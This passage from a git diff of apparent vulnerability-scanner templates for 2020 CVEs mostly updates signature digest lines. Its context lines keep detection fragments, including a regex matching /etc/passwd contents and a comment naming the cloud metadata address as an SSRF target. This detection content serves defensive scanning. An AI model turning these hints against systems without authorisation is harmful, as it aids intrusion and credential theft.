4a0a00473045022024bfee80b4a813fdfaad6e9372701cea8f2664bab3b38cbf4b70600abd3c1a35022100c72ded856593055fdd190e34880e2193f1d7b44b87bd3b90c007411211938dc5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022030b3599e1a9857d0fc95c48112cba2be9ac3b67042448a669c75808e7af844e8022100ca7979c5043a90a1e48c856bbde83197a8a7b6bab11b044bcb9c8a73d931c51f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index de91bf7781..e031675755 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200accf3c4caa863b672abe4e77a6bc46d5cda541525903caecdeca6896d08b4610220272cf9ff0544789f3b84d8ef6c93c5193db1a41e8377ba2b1c52ef69ff131659:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022053eeb20206ffb6ee30a63fd6a13b40a9cade5fff608634d93f9f567ba4dcd2a502205a676fb5f02de5e217092b2310c2f6225fd31cb78448da0d6f37e4b49b98209a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 64f15c441f..2e2b2afc5f 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -46,4 +46,4 @@ http: - 200 # To get crithit, try http://169.254.169.254/latest/metadata/ -# digest: 4a0a00473045022100ed3e3c2c98f5fbac3b6a03d955a2208b9d144519c8c5b1cf58f498f4395903d602205f515f72054b2543c31c9b43adb2abaa5d15428a198b6cb84055e77b806e17a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008ba36955d3d8cf760de5834db113102a10ffbf06804976084a91c6951a45868202207eedafc95ebdf9fd868c896c35a64f5ac686e1e7949869f7c82d78ce8a5225a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index caf95e138f..bdba609990 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -34,5 +34,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a00473045022100a1dccb18bcc4513e67e2a9d44f1f266da389b047f127068541098a6d0924e91602207dd328da716705cc3a9250c4993bd3afbb92622ab91f41833231b7db584a0825:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c0bd815b1b031652d93a5b8182f5920cb1baa4f7cdac5e73c37d25f0774be610022100e3e13c831fb0a03b3392da36ca39bf7cac842d311e735f6b57d674f59c1162c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index eee30db19d..4e6b950201 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202afa6164a9851d9f7fae957d0b16ef6842dfb1487be2c9d3bae366882e15913902203ee704e1b5f9a2abd8f50bdce69267d8d382ca64ef7f7b9e6c2c4fdfa1355f91:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b1b3636290beeb654a3777966ef2736d18b3ddca6478ee12c31bae77d9c3e04c022100fa7f8d9c0364c2d31500dbd1fc3e073e55de4cb058b1eb789422fb00a4476a25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index fe6392db65..c3956ba0b8 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 503 - -# digest: 4b0a00483046022100bc816029468befe71bb01aef9888a5dd98f948a7a9673f0f105773a2fa6a4e8a022100dd34390029f0e72512a29c129dc39efc337718d836e1d51d3ec8c12c915816a3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201e34d437b92d5500579196434ad0e9c45fbcdb5f56a94a68c83936f921808b43022100af7802d74bd60b9d25795d76e7682a1f5626e9311cf96b1e31b73838ded39ac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index e724a18e55..030c0e2f34 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c408ae2ac8dcac0d10c5802635e49d039d0b62c8b8c14c0e750ca4f871684f46022100b35511823eb58a3da1ccaeb874aa3e171d27d6768a07e563c97d2cef2acd9b8d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e727dbabd745844374ef38d2a8fa15e9d57473221eab8cdad60147e0932edd6d02210098e2739b57709ac56786e867572718545037a5769e60c4cfafa6c35511ac4a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index be6139e288..10fae17c6a 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -47,5 +47,4 @@ http: part: location words: - "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp" - -# digest: 4a0a00473045022100b860eeee763c0a45535c4d1623845e90ba7e1826f7d1eaf8a5818aaad40fe7ae02200e3703e40a8d78f6d2fcf6b3e17b925d591475d2fde6c18edaa7cc50d12b6e2c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207f52767c311243fdfec7e23d7ff965273a57a911f97fc6ebde2efcd08d59504a022100c1de54e6ebbc2b753676dc9dab4bc021c17bc7471d4a8b0a4bdc35128be8180e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index ba4ed59fe0..36a7741033 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ef8a3c44836e6d30433f79430f9be4b6e766e61928da8b5e9cfb91dd8d804b6f022001381fb22675d11dcea39335345df1ff361356ac3d1928da906726663e1ec1f2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022070837c38e63c0a7e7c882457cf7da0ead50bd60047c97f10cdb13a7f53ad8a62022100a1d78c1641d02860c1169aea3c504f34afd851c6f021cd2460a5cc9a03e7e747:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 81d4c17494..9f7981a19b 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -45,5 +45,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "") || contains_all(body, "")' condition: and - -# digest: 4a0a00473045022100aa3fc22a7abb963febda1aea09b994acba0bfc06e8006d47416973e498988334022026e0c78f4b095d98b138758883ce4f84984f6240cd243e417feb66f63036adf9:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f4133ac611fd6023f4ff20e8fd78d9a32efc6daa367364d108a84fe0354d6ed022008fa62124510c55eaf113d9b394df4df6f9f130a388bff59d0f6824fa851fef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 1de47a3f3d..d587c1df19 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200b0b31ac234889c7e7a0c801703eb1e406c3581317fdb424d7feabecb1957fd4022100e597d9d60675586ff68d44b48abb4d412fa82a0eb2ec9e16a9641087d574ae11:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008e1c98ec1152c551ff183bebfa16bccd1de87e2a7373ffdd80b472f082657c1502203f78bc69263b559c131c7370938b04ade534b46fd323822e36a2323e4f36de49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index e51dc5fd9c..7e8b370c54 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -55,5 +55,4 @@ http: - '"sessionId":"([a-z0-9.]+)"' internal: true part: body - -# digest: 4a0a00473045022100825b21f163c5caa5b5cb6d256f68ad7f8600a3f7b35e3a79a45287d75cec9d6902204f2bea67c0844069a8bc676c53fa6e8cfdac547d4d91f5c766c7d1055e9a6667:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cd39e743d4e085dd0ba8344fc3854268869cec0e5a5707a48df78c9665953edb022100f187fdcafd089c255c9dd5f02342d96e46ca4dd44088a6d41d67210b27a19caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index dba4bfda0a..adaab011ca 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bf121aba8af18ceb8f1f1443dbf0f075d4b2c52c8fe324b969dfaee1ab07cee4022026dcc5d9fef1a539138a428004de222ee90226f7bc02962f222d802691263d3d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009500e38986ffc72f81b985c6e523fd008b90d85a13bfc81b5387bcdb237e4e72022049a6a257327e11021b711302ee7e5a7d5d250de0ac224af9cc54ef06fb3e32c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 51e80bf00d..b643514489 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -36,5 +36,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4b0a00483046022100d643aab458de8de9a4abc23bfaabf8714b91c4618fb75d7b94db79ad31f22144022100cfb6b4f5802170f209e9216d89c9a4a8e3d170cafbf4d0f5c8b2f60c91921468:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022076d38d8d58bfd4af7b0dc59a746d1849d5942515708ae167afd3358bfcb410cb022100a5ff52a8c80d4621083cbd6c0b4de9a1c00866c8e8736c6f246154de47dd7bb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index cc363604d5..0d3ea3b308 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b9116e39ab75345af8f33606b60844be397fd086413de279a526c61e304b540702210089e3e7fee6fef950730decb208123336abfcb72bf2da82f51ab6d8062ad31724:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b0bc08bcf260ae8f8281f31b2c35adaad6ad4597dfe39bc299015e19aaed063d0220044f0bda83cfddf93843df20478161f1a94cc75d94984b293158e848ecadcbaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index b1a8a97b45..b6b1017eb8 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -61,5 +61,4 @@ http: - "Microsoft Windows (.*)" - "Distributor ID: (.*)" part: body - -# digest: 4a0a00473045022100b3bb2a881a97a03b7b5b2a5129db2e8dd240d39b4045d2e650f5ed0f3b14a92b02207350b958d4148ce3da98a36cacaa512160b570b1626f7145d3fe10b1ec76690d:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022051003a46a37365ad1f8235a406cfae1690378f2a1e62433e4ab62f023c64145602207e967af5e4baa4e9283efc0b1863e0eae4b8e0e51f8bca722422f4c35fd38d2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 847b626699..641041df41 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008d25081b3e1e6e85ff64ff0e68d070521314adbc501a4727c0827511ec372919022100888a823993f45473e5ce6bfdb9aa9e343beb793dbaecf3bda1122fb4ef5b2de1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022019e37c68af16b235694104121954bb552cc2dc65afcdd87f85685b6997cdcbeb022100cc61f4a235fb4ed21523d1c2a89ed6e489e794aa7744846ef0e7d7f5a48fb156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 34945d0b5b..1dd391f2c7 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f22d2408dbbdcb23acd5d50bccf2f6e05c2b46702eb2543618d3cc2f61807079022001ff66a9c0cf2cf4e23be4809f46ba1c635190dbc380bcbce570bcea488963bc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a3c789fd1d55f317d4218b2fdcd2308bcad1719720b4634dfa1ffdaf0b2c52dc0220654c303e9a9852c140b45c60baa3ce4e0a747423095adbaa6e9edbdf20bdf8c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index c4c5954e7c..2fad6bb447 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -47,5 +47,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4b0a00483046022100f03746a0790baa02bf3ba4709d0cc5fc381b377f3f7314597d56d8608feb2c80022100d2fe476b4f60f66ba8c56d84f8e8a81c1bbdab600fa25df20c179daa94ee6811:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008c18b58342ad43b4fa60f66a138f6bec45d2f531fa2a30017aebe2629f7ba1a302207fc2a7ad3c6713cb49e6ebd6d690f241d722fbd03dec85364249eb90e1171947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index b603ade05d..26bbc56e22 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ec26b17d404b2e5d4961fb3033940b8e93a01bb451f248fd9de3668d71a531fb022100eff2f4f60cb95150aadb7057b9fd76cc48340d80471906763fded4870caad2e4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bd5c13ac2b4d082057e3f1cda9323e315edc92a04b29fc0bb8ac38b1093d72c7022066993b55a53d9dc4120f0373aa3d83d43bd3b0f704402a707037c0dbe8d35e35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 910626d7e2..2c719bb195 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fbaaab618c06055fcc220e8e2dc06795575ee96be3dd36e2e3db2c69e4c81ff4022100b54d832d05605a4f72ed7509b9e8b24099fe5bc383eaa75dbf6f72d1a4d0ebb7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008b1099f00a8031df36a525a2e9cda5f57132d35d297099ed6f9488740c2bee9b022100e361ba4f95a9afd6a1871bcf6fac6c773eb8810684b989f4e8fab85d5e1647b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 66815b6c8c..60981bac7b 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cd4153f46e930abec57be1c09a241d1f3935a6129c55eed536b247e8f004055a0220331a168a7297666436a2cba60e033cfb07b16eadf539a00608f7fd11016a06b1:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202ca9873f6563103883a1ff8da2d2f8bc14090bdc1aa709da0009825421a8a1ee0220464aeb5e6454ce45b2462565d73c54b8347655b0383ff3e436f8d73a0ad07124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index e2b71e8e3d..e02da2da98 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -59,5 +59,4 @@ http: - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and - -# digest: 490a0046304402204e023d514ea9ef5c54c94c0b5b70cfc7dbee87b8d9278498354a672ed91b2eac02204b97c2658d600baa60d6b2fa3656ca32ba34272b6967685f41eb575147ae8e8a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203e334e5f1b71e216c5fd1039ac74ea8fae9e2355cc4be32614c2bd138d14b5ca022100acf9296a4092ac4391b9e0b15b2db0fa7b3fb7c566ae6d1127d762311cc8372a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index e6ff276ec2..ffe84f0a43 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cd7ff5623a65ab5f9a9455ef11cc165b9e46846a03740637f140e713bc461fd80220719e6fef117b9cedb7074872b0f33511432592557b48deb729120a81fc14ea85:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210090059fa7952094aa027481bec11601792f2910e5dbfe9029ccb09551f39c878802206e1a107258b995a72577a10ea8367ca7e1db652817a972e6fe86efaf2ada826d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index de83966cd1..21ff488201 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -54,5 +54,4 @@ http: - "# VERSION : ([0-9.]+)" internal: true part: body - -# digest: 4a0a0047304502207727007c0221c0859778bb4afd6910a282a76e77dd7b6e88e8710c3399549c36022100b63fe7fb0d2a005f963ad322f2828bf4c6df04a1e2a70cc5afde0f5c4dda74d8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bc9e05b5595bfbaed9c01dfc42525e4ff4a8a9db8570df78f5b1928a1845c165022065ff3ba96377996bdd90240f9bba26900e5bf6fb394b98599d6c232b4718598b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index 2a9da5a9e7..efa9f8880f 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -67,5 +67,4 @@ http: regex: - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" part: header - -# digest: 4b0a004830460221009153a20bc21ab8bfa0cd6b6c3a57f1b9b46c348f8bf9458ff544d87607f3ed55022100a616a09f7b9703ad079e3fcd77a97f6c2024e1b1a2beea25e4c3312eb5db558b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008a2312bb305338d0f126959a654ced4e149de6cca3c4f59113670a247b2e75d7022047c6125cce7cd483bfeab445ce07ce55a8a6d6b96290e53741d3649552d22a0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index d718c89eca..e07e6f95a0 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -77,5 +77,4 @@ http: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' internal: true part: header - -# digest: 490a0046304402205d53862d311adc3bef6a5ff4a77ed6fd36f23d05f68f2ec4c8bca4017d5f72240220250d06f5e0127132ebd177ce65dfa3e211718aa5b2e431cf825cf49d29b2cfc5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008d7640e5cd8ebc9a750e3f47b2197e860928e2d0f86a97f69d7cf4b84568bb4102203d9e5a6a1d88163930dce74c2f045d530974f9f916d4bfcda714d86cbca52ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 0bc2ad17ec..b105936126 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -45,5 +45,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 4b0a0048304602210088c8f6d5094a6cb5c621ac4c8c45b5b253d435701769ca16bff34be3c592d950022100cded95d4eba61979c3d7a373fe9003581c6c6ab64ec23f5c680a11160c7fdfad:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204b9f071cdfbd963449aa036c0ede01429c5284bb3b4563e25ad438107f49735402205cc118aa9736bd6c7b5fe163a5f806455a221019abdfa12c5564ebfd36b6ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index 3f6b8baedf..2b8982cf56 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203036b63df51c18617cce5a4dc890ac1a1e9a10c8ea1361b354172cf02d0c0b3702207f59cd73650b3c152f8371dc1d0ef4afc4271f07a03154ffb7d52c463d8723a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0f7f056c812a811299df7b46c59d92096f5c3f710e241721e6308b699204c7c02202653d141c064c737053be6f0488dc797f32d1355a9f014b9319803fa5049daff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index 0f45ec5a20..673b9b4d77 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210092e1be75006d94957d4dc41dee60dbf33d4361361cc5d6db91676f1e7d7e89ee0220270c4bd4483f7abc868788809a5c8ab7707b120a4caada45cb29d7c7f1c0f5dc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048fc6f44718ac6a66ea70eba1ebf8a06377f545330013ef1f5899831a71c5491022100c66fc48f2fdb71d35c3ec9a145fec3ed587017ea6d5eedcbdb9f0c280e6e5d31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index 77ad19ff8e..0be8dbacab 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -77,5 +77,4 @@ http: - '_wpnonce=([0-9a-z]+)' internal: true part: body - -# digest: 490a0046304402201f50280398a4b0387e61e61d761daa212e0526347e9f6ebd34a58a743d55bf50022006534a4e25a589c200e6c7a76dc106c2f656f7f453477fb55f75901ec36e2898:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210083c164f6ff2179dba51b738c8729882dc97d127b3e43bc5985b1b86d931d40de022100be9d72be779117fa54f6d899c928193578239d99192efb10d5c3e6a510015e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index 67546dc85e..af2ef8d205 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -66,5 +66,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f9c2748ddb96a05c92e2b9e84b11025b1d478fefd343d8c505ed3bf602a23c4f022100bcc837630eb09706672cc71008b22995ee78bfde35d23e4bf53db97ab1250633:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ac8a41cb88afe5236579a41ebab0d96b87b1fdbf2d4b3e9316cf790dc039428022100fedfb9fdc42c1517912292304a75ba10c9cffa32ec48d8934e5243fbe7731c71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index 7157b2e4a5..7531e2718e 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220402eaa100c73aca42b453712c28f774e94e4ae47ccd299d3f875f98f06d319d6022100bebda6db733359dc623dd3b3a71d6039a7d0e30236205233a7c1dd8c18f8e7a1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ecb18f109ace5b2a60ad772c85030eeb0d0b50a1685533b2835bcac2e4afe226022100833f138d8bac63106a9eb843b8fdc633c5189700071c971cc11cb4a083e79516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 33a3b8f5d8..8ca6fd3ce3 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bd841764413a53390d7fa59bb2948daaf3f26f3f372bb0ef60f00f55cfc8b9d6022055515c175b8cd323782eb612b9916346852468d9f903dfb549003d781f531985:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008dca68c701b33dcc484f67388b2f380892a32bcf6a58c13ae245a47125a791460221008a725b84757fa2f2ada5db89c5ea369474747ff70dc77673f46bd572b09871f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index b7dd81ca1d..9828a51b6c 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -39,5 +39,4 @@ http: - "ORA-06512:" - "Request Method:" condition: and - -# digest: 4a0a00473045022100c1c8a8f5f83907b4f4fb6fe6428efb34b053cdf0baaea3abf0c6095a6b7ba2e50220360425043a6b30cb3bd1c898bafe2f2c445ef1e9a8ff6cd1b9dc61b2b8315c71:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100eb5aecc32e18d69cda67f174453590cc65b28e1d1592d2778fa1091c7f712b3a02205f1d4f9a42bbd90ab4fc65f0bc480c930bd9924b922cd9ad83cbdba643bf3053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 678a8516b4..a5d0eb916b 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e53259f8874ebf27f2ebc92c0ccd23ab48ab9d0b10d5a29b6e3cad48f166cc81022100a1ded558fc1b2007c24e72479c17973c6c6b1dc109170d371d7cc99fae9aad19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c8888a9cf310b81610ceab52fb5ba5aa7726f9188988b99d9f2c3bff5695d7220220295dd0b162d817f12ca354f6e1d9bfc3906b77c0f3ab812d1d4cb6034c379bff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index cb6e1dfbcf..2a9910d35c 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206fc329c18f12b609ac902d911b1fe293ffbd58b9ca8f25e9e6f1cd9336d8bad8022100b568cac0c152acac85116dcba009bb73da86b6ddedbe3690fb4dd7516a65e665:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022050e25ccec6b5e5a2265df8d8d6a5072a09a15959f7fad2e7e40c1ca921fbf76102205283bccaa12935f6dc8d2336771fc2ce7d1a8eb3f8f7c070217c5778ed14d323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 